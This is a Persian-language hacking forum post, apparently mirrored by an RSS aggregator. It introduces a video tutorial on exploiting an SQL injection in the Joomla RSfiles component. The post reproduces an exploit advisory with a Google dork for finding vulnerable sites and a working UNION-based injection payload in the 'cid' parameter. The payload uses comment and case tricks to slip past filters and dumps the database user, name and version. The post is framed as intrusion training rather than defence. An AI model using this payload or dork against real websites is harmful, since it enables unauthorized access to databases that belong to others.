Quantcast
Channel: انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
Viewing all articles
Browse latest Browse all 19202

باگ جدید Joomla RSfiles Component

$
0
0
با سلام و عرض خسته نباشید؛
ویدئو آموزشی نفوذ به باگ Sql Injection جدیدی که توسط وبسایت exploit-db برای کامپونت RSfiles سیستم مدیریت محتوای جوملا معرفی شده رو براتون قرار میدم.
در این آموزش با نحوه ی اینجکت کردن به جوملا از طریق SQL Injection و بای پی زدن Union آشنا میشوید.
فایل help پیوست شد ..
تشکر نشانه ی رضایت شماست
کد:

# Title  :  Joomla Component RSfiles <= (cid) SQL injection Vulnerability
# Author  :  ByEge
# Contact :  http://byege.blogspot.com
# Date    :  18.03.2013
# S.Page  :  http://www.rsjoomla.com
# Dork    :  inurl:index.php?option=com_rsfiles
# DorkEx  :  http://www.google.com.tr/#hl=tr&sclient=psy-ab&q=inurl:index.php?option=com_rsfiles
 
Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
 
[[SQL Injection Test]]]
 
http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--


فایل های پیوست شده
نوع فایل: rar Joomla RSfiles Component.rar (1.16 مگابایت)

Viewing all articles
Browse latest Browse all 19202

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>